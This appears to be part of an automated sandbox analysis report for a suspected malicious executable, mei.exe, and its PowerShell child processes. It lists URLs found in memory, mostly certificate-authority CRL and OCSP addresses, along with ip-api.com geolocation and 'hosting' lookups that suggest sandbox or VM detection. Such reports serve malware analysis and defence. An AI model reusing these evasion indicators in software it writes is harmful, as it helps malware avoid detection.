00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 
00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 
00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: mei.exe, 00000001.00000003.1674817727.000002E913964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: mei.exe, 00000001.00000003.1788584216.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029359579.000002E9139B4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913E8A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913E8C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1785141429.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032296817.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913E8B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029764503.000002E9139B5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031403845.000002E9139B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: mei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000009.00000002.1743684934.000001BACE158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C14DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 
00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 
00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 
00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1830961000.000001E1B1461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: mei.exe, 00000001.00000002.2035788028.000002E9144F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000038.00000002.1830961000.000001E1B2A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: mei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678327780.000002E913E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
